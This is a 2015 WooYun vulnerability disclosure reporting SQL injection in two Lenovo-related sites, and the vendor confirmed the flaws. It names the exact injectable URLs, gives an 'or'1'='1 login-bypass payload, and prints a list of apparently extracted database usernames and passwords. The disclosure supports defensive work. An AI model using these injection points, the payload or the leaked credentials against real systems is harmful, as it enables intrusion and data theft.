当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094278

漏洞标题:联想2个重要站点SQL注入漏洞

相关厂商:联想

漏洞作者: Vigoss_Z

提交时间:2015-01-28 12:59

修复时间:2015-03-14 13:00

公开时间:2015-03-14 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-28: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-14: 细节向公众公开

简要描述:

rt

详细说明:

联想的微信站点,前面已经有人提过了: WooYun: 联想某站未授权访问泄露大量信息(可以官方身份推送各种内容)
直接发注入点:

http://weixin.lenovo.com.cn/weixin/index.php/product/detail?sn=EB10963046&openid=oLHCTjjXMSI2nazmgh3xmf87B3TE


25个库,可以union,有个库里一千多张表,醉了.

00001.jpg

00002.jpg


0x2

https://kdb.ecare365.com/index.php/Home/GetPass/index


找会密码处,注入漏洞,验证码又是摆设。 因为'or'1'='1获得用户后,会给手机发短信,所有就不跑了,看图

00003.jpg


漏洞证明:

联想的微信站点,前面已经有人提过了: WooYun: 联想某站未授权访问泄露大量信息(可以官方身份推送各种内容)
直接发注入点:

http://weixin.lenovo.com.cn/weixin/index.php/product/detail?sn=EB10963046&openid=oLHCTjjXMSI2nazmgh3xmf87B3TE


25个库,可以union,有个库里一千多张表,醉了.

00001.jpg

00002.jpg


0x2

https://kdb.ecare365.com/index.php/Home/GetPass/index


找会密码处,注入漏洞,验证码又是摆设。 因为'or'1'='1获得用户后,会给手机发短信,所有就不跑了,看图

00003.jpg


修复方案:

你们用thinkphp开发的站点都有注入。

'1q2w3e4r' for user 'zhaowei'
'monitor' for user 'monitor'
'weixintest_zxh' for user 'weixintest_zxh'
'monitor' for user 'monitor'
'weixinrp' for user 'weixinrp'
'weixintest_dxf' for user 'weixintest_dxf'
'wxselect_dxf' for user 'wxselect_dxf'
'weixintestliu' for user 'weixintestliu'
'weixin_test' for user 'weixin_test'
'zhangxuehai' for user 'zhangxuehai'
'wxselectbin' for user 'wxselectbin'
'weixintest184' for user 'weixintest184'
'weixinrp' for user 'weixinrp'
'weixinselect_242' for user 'weixinselect_242
'houyf_test' for user 'houyf_test'
'weixin_test' for user 'weixin_test'
'wxselect' for user 'wxselect'
'weixin_hm' for user 'weixin_hm'
'weixintest183' for user 'weixintest183'
'zxh' for user 'zxh'
'weixinrp141' for user 'weixinrp141'
'weixin_test' for user 'weixin_test'

版权声明:转载请注明来源 Vigoss_Z@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-28 17:16

厂商回复:

谢谢您对联想安全工作的支持,我们会尽快修复漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-28 12:55 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    看来联想被黑是正常的。。。。